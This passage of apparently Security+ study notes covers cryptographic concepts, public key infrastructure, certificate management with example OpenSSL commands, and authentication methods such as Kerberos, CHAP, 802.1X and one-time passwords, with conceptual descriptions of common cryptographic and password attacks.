be used in public key cryptography ciphers.
○ The principal advantage of ECC over RSA's algorithm is that there are no
known "shortcuts" to cracking the cipher or the math that underpins it.

Digital Signatures
● A message digest encrypted using the sender's private key that is appended to a
message to authenticate the sender and prove message integrity.
● 1. Alice (the sender) creates a digest of a message, using a pre-agreed hash
algorithm, and encrypts the digest using Alice’s private key. This creates Alice’s
digital signature.
● 2. Alice attaches the digital signature and sends both the message and public
key to Bob (the receiver).
● 3. Bob decrypts the digital signature using Alice's public key, resulting in the
digest of the message.
● 4. Bob then creates a digest of the message, using the same pre-agreed hash
algorithm that Alice used. Bob compares both digests.

Digital Envelopes and Key Exchange

● Public key cryptography makes it easy to distribute a key, but can only be used
efficiently with small amounts of data.
○ Therefore, both are used within the same product in a type of key
exchange system known as a digital envelope or hybrid encryption.
● A digital envelope allows the sender and recipient to exchange a symmetric
encryption key securely by using public key cryptography
 ●

Digital Certificates
● The question then arises of how anyone can trust the identity of the person or
server issuing a public key.
● One solution is to have a third party, referred to as a certificate authority (CA),
validate the owner of the public key by issuing the subject with a certificate.
● The process of issuing and verifying certificates is called public key infrastructure
(PKI).

Perfect Forward Secrecy

● A characteristic of transport encryption that ensures if a key is compromised the
compromise will only affect a single session and not facilitate recovery of
plaintext data from other sessions.
 ● Diffie-Hellman (DH): agreement to create ephemeral session keys without using
the server's private key.
○ Ephemeral: In cryptography, a key that is used within the context of a
single session only.
● Using ephemeral session keys means that any future compromise of the server
will not translate into an attack on recorded data.
● Also, even if an attacker can obtain the key for one session, the other sessions
will remain confidential.
● PFS can be implemented using either the Diffie-Hellman Ephemeral mode
(DHE or EDH).

Cipher Suites and Modes of Operation

● In a protocol such as Transport Layer Security (TLS), the requirements to both
authenticate the identity of the server and to encrypt communications between
the server and client need to be fulfilled by separate cryptographic products and
cipher implementations.
● Cipher Suite: Lists of cryptographic algorithms that a server and client can use to
negotiate a secure connection.
● Cipher Block Chaining (CBC) Mode:
○ Applies an initialization vector (IV) to the first plaintext block to ensure that
the key produces a unique ciphertext from any given plaintext.
○ The output of the first ciphertext block is then combined with the next
plaintext block using an XOR operation.
● Counter Mode:
○ Counter mode applies an IV plus an incrementing counter value to the key
to generate a keystream.
○ Each block can be processed individually and consequently in parallel,
improving performance.

Authenticated Modes of Operation

● Authenticated Encryption:
 ○ Provides an authentication and integrity mechanism by hashing a
combination of the message output and a shared secret key.
● Authenticated Encryption with Additional Data (AEAD):
○ In an AEAD scheme, the associated data allows the receiver to use the
message header to ensure the payload has not been replayed from a
different communication stream.

Cryptography Supporting Authentication and Non-Repudiation

● Cryptographic Primitive: A single hash function, symmetric cipher, or asymmetric
cipher.
● Non-repudiation is linked to identification and authentication.
○ It is the concept that the sender cannot deny sending the message.
○ If the message has been encrypted in a way known only to the sender, it
follows that the sender must have composed it.
● Authentication and non-repudiation depend on the recipient not being able to
encrypt the message, or the recipient would be able to impersonate the sender.

Cryptography Supporting Confidentiality

● File Encryption:
○ The user is allocated an asymmetric cipher key pair.
○ The private key is written to secure storage—often a trusted platform
module (TPM)—and is only available when the user has authenticated to
his or her account.
● Transport Encryption:
○ This uses either digital envelopes or perfect forward secrecy.
○ For HTTPS, a web server is allocated a key pair and stores the private key
securely.
■ The public key is distributed to clients via a digital certificate.
■ The client and server use the key pair to exchange or agree on one
or more AES cipher keys to use as session keys.
Cryptography Supporting Integrity and Resiliency
● Integrity is proved by hashing algorithms, which allow two parties to derive the
same checksum and show that a message or data has not been tampered with.
● A basic hash function can also be used with a shared secret to create a
message authentication code (MAC), which prevents a man-in-the-middle
tampering with the checksum.
● Obfuscation is the art of making a message difficult to understand.

Cryptographic Performance Limitations

● Main Performance factors of Ciphers:
○ Speed—for symmetric ciphers and hash functions, speed is the amount of
data per second that can be processed.
■ Asymmetric ciphers are measured by operations per second.
○ Time/latency—for some use cases, the time required to obtain a result is
more important than a data rate.
■ For example, when a secure protocol depends on ciphers in the
handshake phase, no data transport can take place until the
handshake is complete.
○ Size—the security of a cipher is strongly related to the size of the key, with
longer keys providing better security.
○ Computational overheads—in addition to key size selection, different
ciphers have unique performance characteristics.
■ Some ciphers require more CPU and memory resources than
others, and are less suited to use in a resource-constrained
environment.
○ Low power devices—some technologies or ciphers configured with longer
keys require more processing cycles and memory space.
■ This makes them slower and means they consume more power.
○ Low latency uses—this can impact protocol handshake setup times.
■ A longer handshake will manifest as delay for the user, and could
cause timeout issues with some applications.
Cryptographic Security Limitations
● Entropy: A measure of disorder. Cryptographic systems should exhibit high
entropy to better resist brute force attacks.
● A weak key is one that produces ciphertext that is lower entropy than it should
be.
● Predictability: a weakness in either the cipher operation or within particular key
values that make a ciphertext lower entropy and vulnerable to cryptanalysis.
○ Reuse of the same key within the same session can cause this type of
weakness.
● Nonce—the principal characteristic of a nonce is that it is never reused ("number
used once") within the same scope (that is, with the same key value).
● Initialization vector (IV)—the principal characteristic of an IV is that it is random
(or pseudo-random).
● Salt: A security countermeasure that mitigates the impact of a rainbow table
attack by adding a random value to ("salting") each plaintext input.

Longevity and Cryptographic Attacks

● Longevity is a measure of the confidence that people have in a given cipher.
● In another sense, longevity is the consideration of how long data must be kept
secure.

Man-In-The-Middle and Downgrade Attacks

● Cryptographic attacks are used to try to intercept confidential data or to spoof
cryptographic credentials, such as a digital certificate.
● A man-in-the-middle (MITM) attack is typically focused on public key
cryptography.
○ 1. Mallory eavesdrops the channel between Alice and Bob and waits for
Alice to request Bob's public key.
○ 2. Mallory intercepts the communication, retaining Bob's public key, and
sends Mallory's public key to Alice.
○ 3. Alice uses Mallory's key to encrypt a message and sends it to Bob.
 ○ 4. Mallory intercepts the message and decrypts it using Mallory's private
key.
○ 5. Mallory then encrypts a message (possibly changing it) with Bob's
public key and sends it to Bob, leaving Alice and Bob oblivious to the fact
that their communications have been compromised.
● This attack is prevented by using secure authentication of public keys, such as
associating the keys with certificates.
● Downgrade Attack:
○ Used to facilitate a man-in-the-middle attack by requesting that the server
use a lower specification protocol with weaker ciphers and key lengths.
○ For example, rather than use TLS 1.3, as the server might prefer, the
client requests the use of SSL.
○ It then becomes easier for Mallory to forge the signature of a certificate
authority that Alice trusts and have Alice trust Mallory's public key.

Salting
● Passwords stored as hashes are vulnerable to brute force and dictionary attacks.
● A password hash cannot be decrypted; hash functions are one-way.
● However, an attacker can generate hashes to try to find a match for password
hash captured from network traffic or password file.
● A brute force attack simply runs through every possible combination of letters,
numbers, and symbols.
● A dictionary attack creates hashes of common words and phrases.
● Both these attacks can be slowed down by adding a salt value when creating the
hash, so you compute:
○ (salt + password) * SHA = hash
○ It simply means that an attacker cannot use precomputed tables of
hashes.
○ The hash values must be recompiled with the specific salt value for each
password.
Key Stretching
● Takes a key that's generated from a user password and repeatedly converts it to
a longer and more random key.
● The initial key may be put through thousands of rounds of hashing.
● The Password-Based Key Derivation Function 2 (PBKDF2) is very widely
used for this purpose, notably as part of Wi-Fi Protected Access (WPA).
○ Implementation of key stretching to make potentially weak input used to
derive a cryptographic key, such as short passwords, less susceptible to
brute force attacks.

Collisions and The Birthday Attack

● A birthday attack is a type of brute force attack aimed at exploiting collisions in
hash functions.
● A collision is where a function produces the same hash value for two different
plaintexts.
○ This type of attack can be used for the purpose of forging a digital
signature.
○ 1. The attacker creates a malicious document and a benign document that
produce the same hash value. The attacker submits the benign document
for signing by the target.
○ 2. The attacker then removes the signature from the benign document and
adds it to the malicious document, forging the target's signature.
● To exploit the paradox, the attacker creates multiple malicious and benign
documents, both featuring minor changes (punctuation, extra spaces, and so on).

Quantum and Post-Quantum

● Quantum refers to computers that use properties of quantum mechanics to
significantly out-perform classical computers at certain tasks.
● A quantum computer performs processing on units called qubits (quantum bits).
○ A qubit can be set to 0 or 1 or an indeterminate state called a
superposition, where there is a probability of it being either 1 or 0.
 ○ The power of quantum computing comes from the fact that qubits can be
entangled.
○ The strength of this architecture is that a single operation can utilize huge
numbers of state variables represented as qubits, while a classical
computer's CPU must go through a read, execute, write cycle for each bit
of memory.
● Communications:
○ The properties of entanglement, superposition, and collapse suit the
design of a tamper-evident communication system that would allow secure
key agreement.
● Post-Quantum:
○ Post-quantum refers to the expected state of computing when quantum
computers that can perform useful tasks are a reality.
○ Currently, the physical properties of qubits and entanglement make
quantum computers very hard to scale up.
● Lightweight Cryptography:
○ NIST is hoping that a compact cipher suite will be developed that is both
quantum resistant and that can run on battery-powered devices with
minimal CPU and memory resources.

Homomorphic Encryption
● is principally used to share privacy-sensitive data sets.
 ● Homomorphic encryption is a solution for this use case because it allows the
receiving company to perform statistical calculations on fields within the data
while keeping the data set as a whole encrypted.
● For example, if you want to perform analytics on customer interactions, an
analysis tool will be able to sum logons without any account identifiers like email
addresses ever being decrypted.

Blockchain
● a concept in which an expanding list of transactional records is secured using
cryptography.
● Each record is referred to as a block and is run through a hash function.
● The hash value of the previous block in the chain is added to the hash calculation
of the next block in the chain.
● Blockchain ensures availability through decentralization, and integrity through
cryptographic hashing and timestamping.

Steganography
● (literally meaning "hidden writing") is a technique for obscuring the presence of a
message.
● The container document or file is called the covertext.
● A steganography tool is software that either facilitates this or conversely that can
be used to detect the presence of a hidden message within a covertext.
● These methods might be used for command and control or to exfiltrate data
covertly, bypassing protection mechanisms such as data loss prevention

Lesson 6: Implementing Public Key Infrastructure

Public and Private Key Usage

● When you want others to send you confidential messages, you give them your
public key to use to encrypt the message.
 ● The message can then only be decrypted by your private key, which you keep
known only to yourself.
● When you want to authenticate yourself to others, you create a signature and
sign it by encrypting the signature with your private key.
○ You give others your public key to use to decrypt the signature. As only
you know the private key, everyone can be assured that only you could
have created the signature.
● Public key infrastructure (PKI) aims to prove that the owners of public keys are
who they say they are.

Certificate Authorities
● The certificate authority (CA) is the entity responsible for issuing and
guaranteeing certificates.
● Ensure the validity of certificates and the identity of those applying for them
(registration).
● Establish trust in the CA by users and government and regulatory authorities and
enterprises, such as financial institutions.
● Manage the servers (repositories) that store and administer the certificates.
● Perform key and certificate lifecycle management, notably revoking invalid
certificates.

PKI Trust Models

● The trust model is a critical PKI concept, and shows how users and different CAs
are able to trust one another.
● Single CA:
○ a single CA issues certificates to users; users trust certificates issued by
that CA and no other.
○ The problem with this approach is that the single CA server is very
exposed. If it is compromised, the whole PKI collapses.
● Hierarchical (Intermediate CA):
 ○ In the hierarchical model, a single CA (called the root) issues certificates
to several intermediate CAs.
○ The intermediate CAs issue certificates to subjects (leaf or end entities).
○ This model has the advantage that different intermediate CAs can be set
up with different certificate policies, enabling users to perceive clearly
what a particular certificate is designed for.

Registration Authorities and CSRS

● Registration is the process by which end users create an account with the CA
and become authorized to request certificates.
● When a subject wants to obtain a certificate, it completes a certificate signing
request (CSR) and submits it to the CA.
○ The CSR is a Base64 ASCII file containing the information that the subject
wants to use in the certificate, including its public key.
● The CA reviews the certificate and checks that the information is valid.
○ For a web server, this may simply mean verifying that the subject name
and fully qualified domain name (FQDN) are identical, and verifying that
the CSR was initiated by the person administratively responsible for the
domain, as identified in the domain's WHOIS records.
● Registration Authorities (RAs): These entities complete identity checking and
submit CSRs on behalf of end users, but they do not actually sign or issue
certificates.

Digital Certificates
● A digital certificate is issued by a Certificate Authority (CA) as a guarantee that a
public key it has issued to an organization to encrypt messages sent to it
genuinely belongs to that organization.
● Public Key Cryptography Standards (PKCS): Series of standards defining the
use of certificate authorities and digital certificates.
Certificate Attributes

Subject Name Attributes

● Common Name: An X500 attribute expressing a host or user name, also used as
the subject identifier for a digital certificate.
○ Consequently, the CN attribute is deprecated as a method of validating
subject identity.
● The subject alternative name (SAN) extension field is structured to represent
different types of identifiers, including domain names.
○ The SAN field also allows a certificate to represent different subdomains,
such as www.comptia.org and members.comptia.org.
Types of Certificate
● Certificate Policies: A document that defines the different types of certificates
issued by a CA.
● A certificate type is set by configuring the Key Usage attribute.
● The Extended Key Usage (EKU) field—referred to by Microsoft as Enhanced
Key Usage—is a complementary means of defining usage.
○ Typical values used include Server Authentication, Client Authentication,
Code Signing, or Email Protection.
○ In the case of a Key Usage extension marked as critical, an application
should reject the certificate if it cannot resolve the Key Usage value.

Web Server Certificate Types

● Server Certificate: guarantees the identity of e-commerce sites or any sort of
website to which users submit data that should be kept confidential.
● Domain Validation (DV)—proving the ownership of a particular domain.
○ This may be proved by responding to an email to the authorized domain
contact or by publishing a txt record to the domain.
● Extended Validation (EV)—subjecting to a process that requires more rigorous
checks on the subject's legal identity and control over the domain or software
being signed.

Other Certificate Types

● Machine/Computer Certificates:
○ It might be necessary to issue certificates to machines (servers, PCs,
smartphones, and tablets), regardless of function.
○ For example, in an Active Directory domain, machine certificates could be
issued to Domain Controllers, member servers, or even client
workstations.
○ Machines without valid domain-issued certificates could be prevented from
accessing network resources.
● Email/User Certificate:
 ○ An email certificate can be used to sign and encrypt email messages.
○ The user's email address must be entered as the SAN and CN.
○ On a directory-based local network, such as Windows Active Directory,
there may be a need for a wider range of user certificate types.
■ For example, in AD there are user certificate templates for standard
users, administrators, smart card logon/users, recovery agent
users, and Exchange mail users (with separate templates for
signature and encryption).
● Code Signing Certificates:
○ issued to a software publisher, following some sort of identity check and
validation process by the CA.
○ The publisher then signs the executables or DLLs that make up the
program to guarantee the validity of a software application or browser
plug-in.
● Root Certificate:
○ is the one that identifies the CA itself.
○ The CN for a root certificate is set to the organization/CA name, such as
"CompTIA Root CA," rather than an FQDN.
● Self-signed Certificates:
○ Any machine, web server, or program code can be deployed with a self-
signed certificate.
○ Self-signed certificates will be marked as untrusted by the operating
system or browser, but an administrative user can choose to override this.

Certificate and Key Management

● Key management refers to operational considerations for the various stages in a
key's life cycle.
● A key's life cycle may involve the following stages:
○ Key generation—creating a secure key pair of the required strength, using
the chosen cipher.
 ○ Certificate generation—to identify the public part of a key pair as
belonging to a subject (user or computer), the subject submits it for
signing by the CA as a digital certificate with the appropriate key usage.
○ Storage—the user must take steps to store the private key securely,
ensuring that unauthorized access and use is prevented.
○ Revocation—if a private key is compromised, the key pair can be revoked
to prevent users from trusting the public key.
○ Expiration and renewal—a certificate key pair that has not been revoked
expires after a certain period. Giving the key or certificate a "shelf-life"
increases security. Certificates can be renewed with new key material.

Key Recovery and Escrow

● M-of-N control, meaning that of N number of administrators permitted to access
the system, M must be present for access to be granted.
○ M must be greater than 1, and N must be greater than M. For example,
when M = 2 and N = 4, any two of four administrators must be present.
● Escrow:
○ In key management, the storage of a backup key with a third party.

Certificate Expiration
● Root certificates might have long expiration dates (10+ years), whereas web
server and user certificates might be issued for 1 year only.
● When you are renewing a certificate, it is possible to use the existing key
(referred to specifically as certificate renewal) or generate a new key (the
certificate is rekeyed).

Certificate Revocation Lists

● A certificate may be revoked or suspended:
○ A revoked certificate is no longer valid and cannot be "un-revoked" or
reinstated.
○ A suspended certificate can be re-enabled.
 ● A certificate may be revoked or suspended by the owner or by the CA for many
reasons.
○ For example, the certificate or its private key may have been
compromised, the business could have closed, a user could have left the
company, a domain name could have been changed, the certificate could
have been misused in some way, and so on.
● CAs must maintain a certificate revocation list (CRL) of all revoked and
suspended certificates, which can be distributed throughout the hierarchy.
● A CRL has the following attributes:
○ Publish period—the date and time on which the CRL is published. Most
CAs are set up to publish the CRL automatically.
○ Distribution point(s)—the location(s) to which the CRL is published.
○ Validity period—the period during which the CRL is considered
authoritative.
○ Signature—the CRL is signed by the CA to verify its authenticity.

Online Certificate Status Protocol Responders

● Online Certificate Status Protocol (OCSP):
○ Allows clients to request the status of a digital certificate, to check whether
it is revoked.
○ Rather than return a whole CRL, this just communicates the status of the
requested certificate.
● Stapling: Mechanism used to mitigate performance and privacy issues when
requesting certificate status from an OCSP responder.

Certificate Pinning
● Pinning refers to several techniques to ensure that when a client inspects the
certificate presented by a server or a code-signed application, it is inspecting the
proper certificate.
 ● This might be achieved by embedding the certificate data in the application code,
or by submitting one or more public keys to an HTTP browser via an HTTP
header, which is referred to as HTTP Public Key Pinning (HPKP).

Certificate Formats
● There are various formats for encoding a certificate as a digital file for exchange
between different systems.
● Encoding:
○ Cryptographic data—both certificates and keys—are processed as binary
using Distinguished Encoding Rules (DER).
○ More typically, the binary data is represented as ASCII text characters
using Base64 Privacy-enhanced Electronic Mail (PEM) encoding.
● File Extensions:
○ A three character file extension is a convention, not a standard, and
unfortunately file extensions do not always map cleanly to the type of
encoding used within a certificate file, or even to the contents of a
certificate file.
○ Both .DER and .PEM can be used as file extensions, although the latter is
not recognized by Windows. .PEM is the most widely used extension for
ASCII format files in Linux.
○ The .CRT and .CER extensions can also be used, but they are not well-
standardized. Most of the confusion arises from the way Windows handles
certificates. In Linux, .CRT is most likely to represent an ASCII certificate.
In Windows, the most common extension is .CER, but this does not tell
you whether the file format is binary or ASCII.
● Contents:
○ The PKCS #12 format allows the export of the private key with the
certificate.
■ This type of file format is usually password-protected and always
binary.
 ○ The P7B format implements PKCS #7, which is a means of bundling
multiple certificates in the same file.

OpenSSL
● For Linux, CA services are typically implemented using the OpenSSL suite.
● Root CA:
○ To configure a root CA in OpenSSL, set up a directory structure and adapt
an OpenSSL configuration file (openssl.cnf) for any site-local settings. You
then need to create an RSA key pair:
■ openssl genrsa -aes256 -out cakey.pem 4096
○ The -aes256 argument encrypts the key and requires a password to
make use of it.
○ The next step is to use this RSA key pair to generate a self-signed root
X.509 digital certificate:
■ openssl req -config openssl.cnf -key cakey.pem -
new -x509 -days 7300 -sha256 -out cacert.pem
● Certificate Signing Requests:
○ To configure a certificate on a host, create a certificate signing request
(CSR) with a new key pair. This command is run on the web server:
■ openssl req -nodes -new -newkey rsa:2048 -out
www.csr -keyout www.key
○ This CSR file must then be transmitted to the CA server. On the CA, run
the following command to sign the CSR and output the X.509 certificate:
■ openssl ca -config openssl.cnf -extensions
webserver -infiles www.csr -out www.pem

Certificate Issues
● The most common problem when dealing with certificate issues is that of a client
rejecting a server certificate (or slightly less commonly, an authentication server
rejecting a client's certificate).
 ● If the problem is with an existing certificate that has been working previously,
check that the certificate has not expired or been revoked or suspended.
● If the problem is with a new certificate, check that the key usage settings are
appropriate for the application.
○ Some clients, such as VPN and email clients, have very specific
requirements for key usage configuration.
○ Also, check that the subject name is correctly configured and that the
client is using the correct address.
● If troubleshooting a new certificate that is correctly configured, check that clients
have been configured with the appropriate chain of trust.
○ You need to install root and intermediate CA certificates on the client
before a leaf certificate can be trusted.
● In either case, verify that the time and date settings on the server and client are
synchronized. Incorrect date/time settings are a common cause of certificate
problems.

Lesson 7: Implementing Authentication Controls

Identity and Access Management

● An identity and access management (IAM) system is usually described in
terms of four main processes:
○ Identification—creating an account or ID that uniquely represents the
user, device, or process on the network.
○ Authentication—proving that a subject is who or what it claims to be
when it attempts to access the resource.
○ Authorization—determining what rights subjects should have on each
resource, and enforcing those rights.
○ Accounting—tracking authorized usage of a resource or use of rights by
a subject and alerting when unauthorized use is detected or attempted.
● IAM enables you to define the attributes that make up an entity's identity, such as
its purpose, function, security clearance, and more.
Authentication Factors
● Authentication is performed when the account holder supplies the appropriate
credentials (or authenticators) to the system.
● There are many different technologies for defining credentials and can be
categorized as factors.
● Something You Know Authentication:
○ A personal identification number (PIN) is also something you know,
although long PIN codes are hard to remember, and short codes are too
vulnerable for most authentication systems.
● Something You Have Authentication:
○ An ownership factor means that the account holder possesses something
that no one else does, such as a smart card, fob, or wristband
programmed with a unique identity certificate or account number.
● Something You Are/Do Authentication:
○ A biometric factor uses either physiological identifiers, such as a
fingerprint, or behavioral identifiers, such as the way someone moves
(gait).

Authentication Design
● Authentication design refers to selecting a technology that meets requirements
for confidentiality, integrity, and availability.

Multi Factor Authentication

● An authentication technology is considered strong if it combines the use of more
than one type of knowledge, ownership, and biometric factor.

Authentication Attributes
● Somewhere You Are Authentication:
○ Location-based authentication measures some statistic about where you
are.
 ○ This could be a geographic location, measured using a device's location
service, or it could be by IP address.
● Something You Can Do Authentication:
○ Behavioral characteristics, such as the way you walk or the way you hold
your smartphone, can uniquely identify you to a considerable degree of
accuracy.
● Something You Exhibit Authentication:
○ refers to behavioral-based authentication and authorization, with specific
emphasis on personality traits.
○ For example, the way you use smartphone apps or web search engines
might conform to a pattern of behavior that can be captured by machine
learning analysis as a statistical template.
● Someone You Know Authentication:
○ A someone you know authentication scheme uses a web of trust model,
where new users are vouched for by existing users.

Local, Network, and Remote Authentication

● A plaintext password is not usually transmitted or stored in a credential database
because of the risk of compromise. Instead, the password is stored as a
cryptographic hash.
○ When a user enters a password to log in, an authenticator converts what
is typed into a hash and transmits that to an authority.
○ The authority compares the submitted hash to the one in the database
and authenticates the subject only if they match.
● Windows Authentication:
○ Windows local sign-in—the Local Security Authority (LSA) compares the
submitted credential to a hash stored in the Security Accounts Manager
(SAM) database, which is part of the registry.
○ Windows network sign-in—the LSA can pass the credentials for
authentication to a network service.
 ■ The preferred system for network authentication is based on
Kerberos, but legacy network applications might use NT LAN
Manager (NTLM) authentication.
○ Remote sign-in—if the user's device is not connected to the local network,
authentication can take place over some type of virtual private network
(VPN) or web portal.
● Linux Authentication:
○ In Linux, local user account names are stored in /etc/passwd.
○ When a user logs in to a local interactive shell, the password is checked
against a hash stored in /etc/shadow.
○ A pluggable authentication module (PAM) is a package for enabling
different authentication providers, such as smart-card login.
● Single Sign-On (SSO):
○ A single sign-on (SSO) system allows the user to authenticate once to a
local device and be authenticated to compatible application servers
without having to enter credentials again.

Kerberos Authentication
● Kerberos is a single sign-on network authentication and authorization protocol
used on many networks, notably as implemented by Microsoft's Active Directory
(AD) service.
● Kerberos was named after the three-headed guard dog of Hades (Cerberus)
because it consists of three parts.
● Clients request services from application servers, which both rely on an
intermediary—a Key Distribution Center (KDC)—to vouch for their identity.
● There are two services that make up a KDC: the Authentication Service and the
Ticket Granting Service.
 ●
● The Authentication Service is responsible for authenticating user logon requests.
● 1. The client sends the authentication service (AS) a request for a Ticket
Granting Ticket (TGT).
○ This is composed by encrypting the date and time on the local computer
with the user's password hash as the key.
● 2. The AS checks that the user account is present, that it can decode the request
by matching the user's password hash with the one in the Active Directory
database, and that the request has not expired.
○ If the request is valid, the AS responds with the following data:
■ Ticket Granting Ticket (TGT)—this contains information about the
client (name and IP address) plus a timestamp and validity period.
■ Ticket Granting Service (TGS) session key for use in
communications between the client and the TGS.

Kerberos Authorization
● 1. To access resources within the domain, the client requests a Service Ticket (a
token that grants access to a target application server).
○ This process of granting service tickets is handled by the TGS.
● 2. The client sends the TGS a copy of its TGT and the name of the application
server it wishes to access plus an authenticator, consisting of a time-stamped
client ID encrypted using the TGS session key.
● 3. The TGS service responds with:
 ○ Service session key—for use between the client and the application
server. This is encrypted with the TGS session key.
○ Service ticket—containing information about the user, such as a
timestamp, system IP address, Security Identifier (SID) and the SIDs of
groups to which he or she belongs, and the service session key.
● 4. The client forwards the service ticket, which it cannot decrypt, to the
application server and adds another time-stamped authenticator, which is
encrypted using the service session key.
● 5. The application server decrypts the service ticket to obtain the service session
key using its secret key, confirming that the client has sent an untampered
message.
○ It then decrypts the authenticator using the service session key.
● 6. Optionally, the application server responds to the client with the timestamp
used in the authenticator, which is encrypted by using the service session key.
○ The client decrypts the timestamp and verifies that it matches the value
already sent, and concludes that the application server is trustworthy.
● 7. The server now responds to client requests (assuming they conform to the
server's access control list).
●
PAP, CHAP, and MS-CHAP Authentication
● PAP:
○ an unsophisticated authentication method developed as part of the Point-
to-Point Protocol (PPP), used to transfer TCP/IP data over serial or dial-up
connections.
○ It relies on clear text password exchange and is therefore obsolete for
most purposes, except through an encrypted tunnel.
● CHAP:
○ also developed as part of PPP as a means of authenticating users over a
remote link.
○ CHAP relies on an encrypted challenge in a system called a three-way
handshake.
○ 1. Challenge—the server challenges the client, sending a randomly
generated challenge message.
○ 2. Response—the client responds with a hash calculated from the server
challenge message and client password (or other shared secret).
○ 3. Verification—the server performs its own hash using the password hash
stored for the client. If it matches the response, then access is granted;
otherwise, the connection is dropped.
○ This guards against replay attacks, in which a previous session could be
captured and reused to gain access.
● MS-CHAPv2:
○ Implementation of CHAP created by Microsoft for use in its products.

Password Attacks
● When a user chooses a password, the password is converted to a hash using a
cryptographic function, such as MD5 or SHA.
● Plaintext/Unencrypted Attacks:
○ A plaintext/unencrypted attack exploits password storage or a network
authentication protocol that does not use encryption.
● Online Attacks:
 ○ An online password attack is where the threat actor interacts with the
authentication service directly—a web login form or VPN gateway, for
instance.
○ The attacker submits passwords using either a database of known
passwords (and variations) or a list of passwords that have been cracked
offline.
● Password Spraying:
○ a horizontal brute-force online attack.
○ This means that the attacker chooses one or more common passwords
(for example, password or 123456) and tries them in conjunction with
multiple usernames.
● Offline Attacks:
○ An offline attack means that the attacker has managed to obtain a
database of password hashes, such as %SystemRoot%\System32\
config\SAM, %SystemRoot%\NTDS\NTDS.DIT (the Active Directory
credential store), or /etc/shadow.
○ Threat actors can also read credentials from host memory, in which case
the only reliable indicator might be the presence of attack tools on a host.

Brute Force and Dictionary Attacks

● A brute-force attack attempts every possible combination in the output space in
order to match a captured hash and guess at the plaintext that generated it.
○ The output space is determined by the number of bits used by the
algorithm (128-bit MD5 or 256-bit SHA256, for instance).
○ The larger the output space and the more characters that were used in the
plaintext password, the more difficult it is to compute and test each
possible hash to find a match.
● Dictionary and Rainbow Table Attacks:
○ A dictionary attack can be used where there is a good chance of
guessing the likely value of the plaintext, such as a non-complex
password.
 ■ The software generates hash values from a dictionary of plaintexts
to try to match one to a captured hash.
○ Rainbow Table: The attacker uses a precomputed lookup table of all
possible passwords and their matching hashes.
■ The hash value of a stored password can then be looked up in the
table and the corresponding plaintext discovered.
● Hybrid Attack:
○ A hybrid password attack uses a combination of attack methods when
trying to crack a password.
○ A typical hybrid password attack uses a combination of dictionary and
brute force attacks.

Password Crackers
● Password guessing software can attempt to crack captured hashes of user
credentials by running through all possible combinations (brute force).
● Hashcat: Command-line tool used to perform brute force and dictionary attacks
against password hashes.

Authentication Management
● An authentication management solution for passwords mitigates this risk by
using a device or service as a proxy for credential storage.
● The manager generates a unique, strong password for each web-based account.
● Password managers can be implemented with a hardware token or as a software
app:
○ Password key—USB tokens for connecting to PCs and smartphones.
Some can use nearfield communications (NFC) or Bluetooth as well as
physical connectivity.
○ Password vault—software-based password manager, typically using a
cloud service to allow access from any device.

Smart-Card Authentication
 ● means programming cryptographic information onto a card equipped with a
secure processing chip.
● The chip stores the user's digital certificate, the private key associated with the
certificate, and a personal identification number (PIN) used to activate the card.
● For Kerberos authentication, smart-card logon works as follows:
○ 1. The user presents the smart card to a reader and is prompted to enter a
PIN.
○ 2. Inputting the correct PIN authorizes the smart card's cryptoprocessor to
use its private key to create a Ticket Granting Ticket (TGT) request, which
is transmitted to the authentication server (AS).
○ 3. The AS is able to decrypt the request because it has a matching public
key and trusts the user's certificate, either because it was issued by a local
certification authority or by a third-party CA that is a trusted root CA.
○ 4. The AS responds with the TGT and Ticket Granting Service (TGS)
session key.

Key Management Devices

● When using public key infrastructure (PKI) for smart-card authentication, the
security of the private key issued to each user is critical.
● Various technologies can be used to avoid the need for an administrator to
generate a private key and transmit it to the user:
○ Smart card—some cards are powerful enough to generate key material
using the cryptoprocessor embedded in the card.
○ USB key—a cryptoprocessor can also be implemented in the USB form
factor.
○ Trusted Platform Module (TPM)—a secure cryptoprocessor enclave
implemented on a PC, laptop, smartphone, or network appliance.
● A hardware security module (HSM) is a network appliance designed to perform
centralized PKI management for a network of devices.
○ This means that it can act as an archive or escrow for keys in case of loss
or damage.
 ○ HSMs are designed to be both tamper-resistant to prevent unauthorized
access and tamper-evident to clearly show any signs of attempted
intrusion, thereby mitigating the risk of insider threats.

Extensible Authentication Protocol/IEEE 802.1X

● The smart-card authentication process described earlier is used for Kerberos
authentication where the computer is attached to the local network and the user
is logging on to Windows.
● Authentication may also be required in other contexts:
○ When the user is accessing a wireless network and needs to authenticate
with the network database.
○ When a device is connecting to a network via a switch and network
policies require the user to be authenticated before the device is allowed
to communicate.
○ When the user is connecting to the network over a public network via a
virtual private network (VPN).
● Extensible Authentication Protocol (EAP) provides a framework for deploying
multiple types of authentication protocols and technologies.
○ Many of them use a digital certificate on the server and/or client machines.
○ This allows the machines to establish a trust relationship and create a
secure tunnel to transmit the user credential or to perform smart-card
authentication without a user password.
 ● IEEE 802.1x: A standard for encapsulating EAP communications over a LAN
(EAPoL) to implement port-based authentication.
● 802.1X uses authentication, authorization, and accounting (AAA) architecture:
○ Supplicant—the device requesting access, such as a user's PC or laptop.
○ Network access server (NAS)—edge network appliances, such as
switches, access points, and VPN gateways. These are also referred to as
RADIUS clients or authenticators.
○ AAA server—the authentication server, positioned within the local
network.

Remote Authentication Dial-In User Service

● A standard protocol used to manage remote and wireless authentication
infrastructures.
● The Network Access Server (NAS)/Network Access Point (NAP) device (RADIUS
client) is configured with the IP address of the RADIUS server and with a shared
secret.
● A generic RADIUS authentication workflow process is as follows:
 ●

Terminal Access Controller Access-Control System

● An AAA protocol developed by Cisco that is often used to authenticate to
administrator accounts for network appliance management.
● TACACS+ uses TCP communications (over port 49), and this reliable,
connection-oriented delivery makes it easier to detect when a server is down.
● All the data in TACACS+ packets is encrypted (except for the header identifying
the packet as TACACS+ data), rather than just the authentication data.
Token Keys and Static Codes
● Smart-card authentication works well when you have close control over user
accounts and the devices used on the network.
● Token: A physical or virtual item that contains authentication and/or authorization
data, commonly used in multifactor authentication.
● A one-time password (OTP) is one that is generated automatically, rather than
being chosen by a user, and used only once.
○ An OTP is generated using some sort of hash function on a secret value
plus a synchronization value (seed), such as a timestamp or counter.
● The device generates a passcode based on the current time and a secret key
coded into the device.

Open Authentication
● The Initiative for Open Authentication (OATH) is an industry body established
with the aim of developing an open, strong authentication framework.
○ Open means a system that any enterprise can link into to perform
authentication of users and devices across different networks.
○ Strong means that the system is based not just on passwords, but also on
2- or 3-factor authentication or on 2-step verification.
● HMAC-Based One-Time Password Algorithm (HOTP):
